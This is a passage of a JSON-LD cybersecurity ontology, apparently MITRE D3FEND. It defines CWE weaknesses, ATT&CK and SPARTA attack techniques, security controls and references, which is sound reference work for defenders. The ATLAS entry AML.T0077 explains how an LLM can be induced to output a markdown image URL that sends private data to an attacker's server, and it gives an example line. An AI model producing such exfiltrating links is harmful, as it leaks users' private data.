      "d3f:definition": "A JAR (Java ARchive) is a package file format typically used to aggregate many Java class files and associated metadata and resources (text, images, etc.) into one file for distribution.",
      "rdfs:label": "Java Archive",
      "rdfs:seeAlso": {
        "@id": "https://dbpedia.org/page/JAR_(file_format)"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ArchiveFile"
        },
        {
          "@id": "d3f:SoftwarePackage"
        }
      ]
    },
    {
      "@id": "d3f:CWE-1274",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1274",
      "d3f:definition": "The product conducts a secure-boot process that transfers bootloader code from Non-Volatile Memory (NVM) into Volatile Memory (VM), but it does not have sufficient access control or other protections for the Volatile Memory.",
      "rdfs:label": "Improper Access Control for Volatile Memory Containing Boot Code",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "d3f:Reference-FileSecurityUsingFileFormatValidation_OPSWATInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patentimages.storage.googleapis.com/ba/10/83/968a6345eee505/US20200104494A1.pdf"
      },
      "d3f:kb-abstract": "A method for securely validating the file format type including receiving a file having a file format type, a header and a content block. The header has a header block with a description representing attributes of the actual content in the file. The content block has leading bytes representing attributes of the actual content, and actual content. Data is parsed from the description of the header block, the leading bytes and the actual content. Data from the description is compared to the data from the leading bytes, data from the leading bytes is compared to the data from the actual content, and data from the description is compared to the data from the actual content. The file format type is validated and trustable when the data from the description, the data from the leading bytes and the data from the actual content are consistent with one another.",
      "d3f:kb-author": "Benjamin Czarny, Yiyi Miao, Jianpeng Mo",
      "d3f:kb-organization": "OPSWAT, Inc.",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:ContentValidation"
        },
        {
          "@id": "d3f:FileFormatVerification"
        }
      ],
      "d3f:kb-reference-title": "File Security Using File Format Validation",
      "rdfs:label": "Reference - File Security Using File Format Validation - OPSWAT Inc"
    },
    {
      "@id": "d3f:CCI-001166_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:DynamicAnalysis"
        },
        {
          "@id": "d3f:EmulatedFileAnalysis"
        },
        {
          "@id": "d3f:FileContentRules"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system identifies organization-defined unacceptable mobile code.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001166"
    },
    {
      "@id": "d3f:blocks",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x blocks y: The entity x blocks off the use of digital artifact y by reference to a block or allow list (or both).",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/01480024-v"
      },
      "rdfs:label": "blocks",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:counters"
        },
        {
          "@id": "d3f:filters"
        },
        {
          "@id": "d3f:may-block"
        }
      ]
    },
    {
      "@id": "d3f:OTSynchronizeTimeCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "Used to align timing mechanisms.",
      "rdfs:label": "OT Synchronize Time Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTTimeCommandEvent"
        },
        {
          "@id": "_:Na81063bd98334515aec97d2d5138ff59"
        }
      ]
    },
    {
      "@id": "_:Na81063bd98334515aec97d2d5138ff59",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTSynchronizeTimeCommand"
      }
    },
    {
      "@id": "d3f:CCI-001762_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization disables organization-defined functions, ports, protocols, and services within the information system deemed to be unnecessary and/or nonsecure.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:SystemConfigurationPermissions"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-02-28T00:00:00"
      },
      "rdfs:label": "CCI-001762"
    },
    {
      "@id": "d3f:SMBFileSupersedeEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a file is overwritten if it exists or created if it does not. This operation combines file creation and modification semantics.",
      "rdfs:label": "SMB File Supersede Event",
      "rdfs:subClassOf": {
        "@id": "d3f:SMBEvent"
      }
    },
    {
      "@id": "d3f:CWE-448",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-448",
      "d3f:definition": "A UI function is obsolete and the product does not warn the user.",
      "rdfs:label": "Obsolete Feature in UI",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-446"
      }
    },
    {
      "@id": "d3f:process-identifier",
      "@type": "owl:DatatypeProperty",
      "d3f:definition": "x process-identifier y: The process x has the process identifier y.",
      "rdfs:label": "process-identifier",
      "rdfs:subPropertyOf": {
        "@id": "d3f:process-data-property"
      }
    },
    {
      "@id": "d3f:T1583.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1583.001",
      "d3f:definition": "Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.",
      "rdfs:label": "Domains",
      "rdfs:subClassOf": {
        "@id": "d3f:T1583"
      }
    },
    {
      "@id": "d3f:WindowsBatchFile",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExecutableScript"
      ],
      "rdfs:label": "Windows Batch File"
    },
    {
      "@id": "d3f:CWE-1097",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1097",
      "d3f:definition": "The product uses a storable data element that does not have all of the associated functions or methods that are necessary to support comparison.",
      "rdfs:label": "Persistent Storable Data Element without Associated Comparison Control Element",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1076"
      }
    },
    {
      "@id": "d3f:FileGetPermissionsEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a file's security settings or access control list (ACL) is retrieved, detailing permissions granted to users or processes.",
      "rdfs:label": "File Get Permissions Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:FileEvent"
        },
        {
          "@id": "_:N2f8b28649a8641e888eb11a97e5bddd7"
        }
      ]
    },
    {
      "@id": "_:N2f8b28649a8641e888eb11a97e5bddd7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileCreationEvent"
      }
    },
    {
      "@id": "d3f:process-ancestor",
      "@type": [
        "owl:ObjectProperty",
        "owl:TransitiveProperty"
      ],
      "d3f:definition": "x process-ancestor y: The process y is a process ancestor of process x, indicating one or more process creation events were conducted at process y and subsequently created process x.",
      "rdfs:label": "process-ancestor",
      "rdfs:subPropertyOf": {
        "@id": "d3f:process-property"
      }
    },
    {
      "@id": "d3f:Reference-Reg.exeCalledFromCommandShell_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2013-03-001/"
      },
      "d3f:kb-abstract": "Registry modifications are often essential in establishing persistence via known Windows mechanisms. Many legitimate modifications are done graphically via regedit.exe or by using the corresponding channels, or even calling the Registry APIs directly. The built-in utility reg.exe provides a command-line interface to the registry, so that queries and modifications can be performed from a shell, such as cmd.exe. When a user is responsible for these actions, the parent of cmd.exe will likely be explorer.exe. Occasionally, power users and administrators write scripts that do this behavior as well, but likely from a different process tree. These background scripts must be learned so they can be tuned out accordingly.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:ProcessLineageAnalysis"
        },
        {
          "@id": "d3f:ProcessSpawnAnalysis"
        }
      ],
      "d3f:kb-reference-title": "CAR-2013-03-001: Reg.exe called from Command Shell",
      "rdfs:label": "Reference - CAR-2013-03-001: Reg.exe called from Command Shell - MITRE"
    },
    {
      "@id": "d3f:Reference-SecuringWebTransactions",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GuidelineReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.nccoe.nist.gov/sites/default/files/library/sp1800/tls-serv-cert-mgt-nist-sp1800-16b-final.pdf"
      },
      "d3f:kb-abstract": "Organizations risk losing revenue, customers, and reputation, and exposing internal or customer data to attackers if they do not properly manage Transport Layer Security (TLS) server certificates. TLS is the most widely used security protocol to secure web transactions and other communications on the internet and internal networks. TLS server certificates are central to the security and operation of internet-facing and internal web services. Improper TLS server certificate management results in significant outages to web applications and services—such as government services, online banking, flight operations, and mission-critical services within an organization—and increased risk of security breaches.",
      "d3f:kb-author": "William Haag, Murugiah Souppaya, Paul Turner, William C. Barker, Brett Pleasant, Susan Symington",
      "d3f:kb-organization": "NIST",
      "d3f:kb-reference-of": {
        "@id": "d3f:ActiveCertificateAnalysis"
      },
      "d3f:kb-reference-title": "Securing Web Transactions",
      "rdfs:label": "Reference - Securing Web Transactions"
    },
    {
      "@id": "d3f:d3fend-use-case-object-property",
      "@type": "owl:ObjectProperty",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-object-property"
      }
    },
    {
      "@id": "d3f:X86CodeSegment",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ImageCodeSegment",
        "d3f:ProcessCodeSegment"
      ],
      "rdfs:label": "X86 Code Segment"
    },
    {
      "@id": "d3f:T1214",
      "@type": "owl:Class",
      "d3f:attack-id": "T1214",
      "d3f:definition": "The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1552.002",
      "rdfs:label": "Credentials in Registry",
      "rdfs:seeAlso": {
        "@id": "d3f:T1552.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:CredentialAccessTechnique"
      }
    },
    {
      "@id": "d3f:has-location",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x has-location y: The entity x is situated in a particular spot or position y.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/02133811-s"
      },
      "rdfs:label": "has-location",
      "rdfs:seeAlso": {
        "@id": "http://www.obofoundry.org/ro/#OBO_REL:located_in"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      },
      "skos:altLabel": "located_in"
    },
    {
      "@id": "d3f:ATTACKEnterpriseDataSource",
      "@type": "owl:Class",
      "rdfs:label": "ATTACK Enterprise Data Source",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKEnterpriseThing"
      }
    },
    {
      "@id": "d3f:MemoryBlock",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:MemoryWord"
      },
      "d3f:definition": "In computing (specifically data transmission and data storage), a block, sometimes called a physical record, is a sequence of bytes or bits, usually containing some whole number of records, having a maximum length; a block size. Data thus structured are said to be blocked. The process of putting data into blocks is called blocking, while deblocking is the process of extracting data from blocks. Blocked data is normally stored in a data buffer and read or written a whole block at a time.",
      "d3f:may-contain": {
        "@id": "d3f:Record"
      },
      "rdfs:isDefinedBy": {
        "@id": "https://dbpedia.org/page/Block_(data_storage)"
      },
      "rdfs:label": "Memory Block",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:MemoryExtent"
        },
        {
          "@id": "_:Nc095d21779a740c997ded7ea86662858"
        },
        {
          "@id": "_:N51417898b3384d4bb191620a2909df18"
        }
      ]
    },
    {
      "@id": "_:Nc095d21779a740c997ded7ea86662858",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MemoryWord"
      }
    },
    {
      "@id": "_:N51417898b3384d4bb191620a2909df18",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Record"
      }
    },
    {
      "@id": "d3f:T1059.013",
      "@type": "owl:Class",
      "d3f:attack-id": "T1059.013",
      "d3f:definition": "Adversaries may abuse built-in CLI tools or API calls to execute malicious commands in containerized environments.",
      "rdfs:label": "Container CLI/API",
      "rdfs:subClassOf": {
        "@id": "d3f:T1059"
      }
    },
    {
      "@id": "d3f:has-mediator",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x has-mediator y: The entity x relies on or is facilitated by entity y.",
      "rdfs:label": "has-mediator",
      "rdfs:subPropertyOf": {
        "@id": "d3f:has-participant"
      }
    },
    {
      "@id": "d3f:DecoyArtifact",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A decoy is an imitation digital artifact in any sense of a digital artifact, object, or phenomenon that is intended to deceive a cyber attacker's surveillance devices or mislead their evaluation.  Examples include fake files, accounts, hosts (honeypots), and network segments (honeynets).",
      "d3f:may-contain": {
        "@id": "d3f:DigitalArtifact"
      },
      "rdfs:label": "Decoy Artifact",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Deception_technology"
        },
        {
          "@id": "https://doi.org/10.1007/978-3-319-25133-2"
        },
        {
          "@id": "https://shield.mitre.org/"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformationBearer"
        },
        {
          "@id": "_:N7596cb9ba72c4ccd87de062dd57049c6"
        }
      ],
      "skos:altLabel": [
        "Decoy",
        "Decoy Object",
        "Lure",
        "Trap"
      ]
    },
    {
      "@id": "_:N7596cb9ba72c4ccd87de062dd57049c6",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DigitalArtifact"
      }
    },
    {
      "@id": "d3f:CWE-463",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-463",
      "d3f:definition": "The accidental deletion of a data-structure sentinel can cause serious programming logic problems.",
      "rdfs:label": "Deletion of Data Structure Sentinel",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-707"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-6_6",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Least Privilege | Privileged Access by Non-organizational Users",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:LocalFilePermissions"
        },
        {
          "@id": "d3f:SystemConfigurationPermissions"
        }
      ],
      "rdfs:label": "AC-6(6)"
    },
    {
      "@id": "d3f:d3fend-catalog-annotation-property",
      "@type": "owl:AnnotationProperty",
      "rdfs:label": "d3fend-catalog-annotation-property",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-annotation"
      },
      "skos:altLabel": "d3fend-vendor-registry-annotation-property"
    },
    {
      "@id": "d3f:CWE-757",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-757",
      "d3f:definition": "A protocol or its implementation supports interaction between multiple actors and allows those actors to negotiate which algorithm should be used as a protection mechanism such as encryption or authentication, but it does not select the strongest algorithm that is available to both parties.",
      "rdfs:label": "Selection of Less-Secure Algorithm During Negotiation ('Algorithm Downgrade')",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-693"
      }
    },
    {
      "@id": "d3f:ChatroomClient",
      "@type": "owl:Class",
      "d3f:definition": "Client software used to conduct any form of synchronous conferencing, occasionally even asynchronous conferencing. The term can thus mean any technology ranging from real-time online chat and online interaction with strangers (e.g., online forums) to fully immersive graphical social environments.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Chat_room"
      },
      "rdfs:label": "Chatroom Client",
      "rdfs:subClassOf": {
        "@id": "d3f:CollaborativeSoftware"
      },
      "skos:altLabel": "Chat Room Client"
    },
    {
      "@id": "d3f:Graph-basedSemi-supervisedLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-GBSSL",
      "d3f:definition": "Graph-based Semi-Supervised Learning (GSSL) methods aim to classify unlabeled data by learning the graph structure and labeled data jointly.",
      "d3f:kb-article": "## References\nYang, S., Pan, L., & Cheng, J. (2021). Graph-based Semi-Supervised Learning Methods for Imbalanced Data Classification. [Link](https://www.sciencedirect.com/science/article/pii/S0031320321002132?viewFullText=true).",
      "rdfs:label": "Graph-based Semi-supervised Learning",
      "rdfs:subClassOf": {
        "@id": "d3f:Semi-supervisedTransductiveLearning"
      }
    },
    {
      "@id": "d3f:LinuxClone",
      "@type": "owl:Class",
      "d3f:definition": "Creates a child process and provides more precise control over the data shared between the parent and child processes.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/clone.2.html"
      },
      "rdfs:label": "Linux Clone",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPICreateProcess"
      }
    },
    {
      "@id": "d3f:T1620",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1620",
      "d3f:definition": "Adversaries may reflectively load code into a process in order to conceal the execution of malicious payloads. Reflective loading involves allocating then executing payloads directly within the memory of the process, vice creating a thread or process backed by a file path on disk (e.g., [Shared Modules](https://attack.mitre.org/techniques/T1129)).",
      "d3f:modifies": {
        "@id": "d3f:ProcessSegment"
      },
      "rdfs:label": "Reflective Code Loading",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "_:N0a33920a08ea4258b3a470e77b14a70e"
        }
      ]
    },
    {
      "@id": "_:N0a33920a08ea4258b3a470e77b14a70e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessSegment"
      }
    },
    {
      "@id": "d3f:CWE-268",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-268",
      "d3f:definition": "Two distinct privileges, roles, capabilities, or rights can be combined in a way that allows an entity to perform unsafe actions that would not be allowed without that combination.",
      "rdfs:label": "Privilege Chaining",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-269"
      }
    },
    {
      "@id": "d3f:T1564.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1564.002",
      "d3f:definition": "Adversaries may use hidden users to hide the presence of user accounts they create or modify. Administrators may want to hide users when there are many user accounts on a given system or if they want to hide their administrative or other management accounts from other users.",
      "d3f:modifies": {
        "@id": "d3f:UserInitConfigurationFile"
      },
      "rdfs:label": "Hidden Users",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1564"
        },
        {
          "@id": "_:N84ded24bf6c843d2b0f7dc41239471ac"
        }
      ]
    },
    {
      "@id": "_:N84ded24bf6c843d2b0f7dc41239471ac",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserInitConfigurationFile"
      }
    },
    {
      "@id": "d3f:AML.T0077",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0077",
      "d3f:definition": "An adversary may get a large language model (LLM) to respond with private information that is hidden from the user when the response is rendered by the user's client. The private information is then exfiltrated. This can take the form of rendered images, which automatically make a request to an adversary-controlled server.\n\nThe adversary gets AI to present an image to the user, which is rendered by the user's client application with no user clicks required. The image is hosted on an attacker-controlled website, allowing the adversary to exfiltrate data through image request parameters. Variants include HTML tags and markdown.\n\nFor example, an LLM may produce the following markdown:\n```\n![ATLAS](https://atlas.mitre.org/image.png?secrets=\"private data\")\n```\n\nWhich is rendered by the client as:\n```\n<img src=\"https://atlas.mitre.org/image.png?secrets=\"private data\">\n```\n\nWhen the request is received by the adversary's server hosting the requested image, they receive the contents of the `secrets` query parameter.",
      "rdfs:label": "LLM Response Rendering - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0077"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASExfiltrationTechnique"
      },
      "skos:prefLabel": "LLM Response Rendering"
    },
    {
      "@id": "d3f:CWE-551",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-551",
      "d3f:definition": "If a web server does not fully parse requested URLs before it examines them for authorization, it may be possible for an attacker to bypass authorization protection.",
      "rdfs:label": "Incorrect Behavior Order: Authorization Before Parsing and Canonicalization",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-696"
        },
        {
          "@id": "d3f:CWE-863"
        }
      ]
    },
    {
      "@id": "d3f:may-be-contained-by",
      "@type": [
        "owl:ObjectProperty",
        "owl:TransitiveProperty"
      ],
      "owl:inverseOf": {
        "@id": "d3f:may-contain"
      },
      "rdfs:label": "may-be-contained-by",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-be-associated-with"
      }
    },
    {
      "@id": "d3f:LinuxInitModule",
      "@type": "owl:Class",
      "d3f:definition": "Loads an ELF image into kernel space, performs any necessary symbol relocations, initializes module parameters to values provided by the caller, and then runs the module's init function.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/init_module.2.html"
      },
      "rdfs:label": "Linux Init_Module",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPILoadModule"
      }
    },
    {
      "@id": "d3f:CWE-544",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-544",
      "d3f:definition": "The product does not use a standardized method for handling errors throughout the code, which might introduce inconsistent error handling and resultant weaknesses.",
      "rdfs:label": "Missing Standardized Error Handling Mechanism",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-755"
      }
    },
    {
      "@id": "d3f:T1548.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1548.003",
      "d3f:definition": "Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.",
      "d3f:may-modify": {
        "@id": "d3f:EventLog"
      },
      "d3f:modifies": {
        "@id": "d3f:OperatingSystemConfigurationFile"
      },
      "rdfs:label": "Sudo and Sudo Caching",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1548"
        },
        {
          "@id": "_:N5546675abcab4189b2294dafadd46505"
        },
        {
          "@id": "_:Nf15db196742b40798fb2e4e2a6dee9d0"
        }
      ]
    },
    {
      "@id": "_:N5546675abcab4189b2294dafadd46505",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:EventLog"
      }
    },
    {
      "@id": "_:Nf15db196742b40798fb2e4e2a6dee9d0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OperatingSystemConfigurationFile"
      }
    },
    {
      "@id": "d3f:EX-0005.01",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0005.01",
      "d3f:definition": "Threat actors may exploit inherent properties or errata in the hardware/logic design rather than injecting new code. Levers include undocumented or weakly specified behaviors (scan chains, test modes, debug straps), counter/timer rollovers and wraparound, interrupt storms and priority inversions, MMU/TLB corner cases, DMA engines that can write outside intended buffers, and bus arbitration or clock-domain crossing issues that permit stale or reordered writes. RNGs and crypto accelerators with flawed seeding or side-channel leakage can expose secrets or enable predictable authentication values. In programmable logic, vulnerable state machines, insufficient reset paths, and hazardous partial-reconfiguration regions create opportunities to drive the design into privileged or undefined states. Even reliability features can be turned: hardware timers intended for liveness can be paced to starve control loops; ECC policies can be nudged so correction conceals attacker-induced drift. The common thread is using the platform’s own guarantees, timing, priority, persistence, or fault handling, to cause privileged behavior that the software stack accepts as “by design.”",
      "rdfs:label": "Design Flaws - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0005/01/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:EX-0005"
      },
      "skos:prefLabel": "Design Flaws"
    },
    {
      "@id": "d3f:IntranetIPCNetworkTraffic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Intranet IPC network traffic is network traffic that does not cross a given network's boundaries and uses a standard inter-process communication (IPC) networking protocol.",
      "d3f:may-contain": {
        "@id": "d3f:File"
      },
      "rdfs:label": "Intranet IPC Network Traffic",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Inter-process_communication"
        },
        {
          "@id": "dbr:Intranet"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:IPCNetworkTraffic"
        },
        {
          "@id": "d3f:IntranetNetworkTraffic"
        },
        {
          "@id": "_:N55becc70dbce458298655171633e8f42"
        }
      ]
    },
    {
      "@id": "_:N55becc70dbce458298655171633e8f42",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:precedes",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x precedes y: The event or action x occurs before event or action y in time.",
      "rdfs:isDefinedBy": {
        "@id": "http://purl.obolibrary.org/obo/BFO_0000063"
      },
      "rdfs:label": "precedes",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:Reference-NetworkMapping",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://en.wikipedia.org/wiki/Network_mapping"
      },
      "d3f:kb-author": "https://en.wikipedia.org/",
      "d3f:kb-reference-title": "Network Mapping",
      "rdfs:label": "Reference - Network Mapping"
    },
    {
      "@id": "d3f:unloads",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x unloads y: The technique or artifact performs the action of unloading some artifact (applications, kernel modules, or hardware drivers, etc.) from a computer's memory.",
      "rdfs:label": "unloads",
      "rdfs:subPropertyOf": {
        "@id": "d3f:evicts"
      }
    },
    {
      "@id": "d3f:T1477",
      "@type": "owl:Class",
      "d3f:attack-id": "T1477",
      "d3f:definition": "The mobile device may be targeted for exploitation through its interface to cellular networks or other radio interfaces.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been deprecated.",
      "rdfs:label": "Exploit via Radio Interfaces - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileInitialAccessTechnique"
      },
      "skos:prefLabel": "Exploit via Radio Interfaces"
    },
    {
      "@id": "d3f:CCI-002462_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system provides additional data integrity verification artifacts along with the authoritative name resolution data the system returns in response to external name/address resolution queries.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:DomainTrustPolicy"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-02T00:00:00"
      },
      "rdfs:label": "CCI-002462"
    },
    {
      "@id": "d3f:IntranetNetwork",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An intranet is a private network accessible only to an organization's staff or delegates. Generally a wide range of information and services from the organization's internal IT systems are available that would not be available to the public from the Internet. A company-wide intranet can constitute an important focal point of internal communication and collaboration, and provide a single starting point to access internal and external resources. In its simplest form an intranet is established with the technologies for local area networks (LANs) and wide area networks (WANs).",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Intranet"
      },
      "rdfs:label": "Intranet Network",
      "rdfs:subClassOf": {
        "@id": "d3f:Network"
      }
    },
    {
      "@id": "d3f:HardwareDevice",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Hardware devices are the physical artifacts that constitute a network or computer system. Hardware devices are the physical parts or components of a computer, such as the monitor, keyboard, computer data storage, hard disk drive (HDD), graphic cards, sound cards, memory (RAM), motherboard, and so on, all of which are tangible physical objects. By contrast, software is instructions that can be stored and run by hardware. Hardware is directed by the software to execute any command or instruction. A combination of hardware and software forms a usable computing system.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Computer_hardware"
      },
      "rdfs:label": "Hardware Device",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/objects/device_hw_info"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformationBearer"
        },
        {
          "@id": "d3f:PhysicalArtifact"
        }
      ]
    },
    {
      "@id": "d3f:OTDeleteDataCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "OT command that removes data on a remote device.",
      "rdfs:label": "OT Delete Data Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTWriteCommandEvent"
        },
        {
          "@id": "_:Nd0599255e6774b79a6761ee8da0ec5ff"
        }
      ]
    },
    {
      "@id": "_:Nd0599255e6774b79a6761ee8da0ec5ff",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTDeleteDataCommand"
      }
    },
    {
      "@id": "d3f:Hardware-basedWriteProtection",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:Hardware-basedWriteProtection"
      ],
      "d3f:d3fend-id": "D3-HBWP",
      "d3f:definition": "Physical methods of preventing data from being written to computer storage.",
      "d3f:hardens": {
        "@id": "d3f:SecondaryStorage"
      },
      "d3f:kb-reference": {
        "@id": "d3f:Reference-WhatisHardwareWriteProtect"
      },
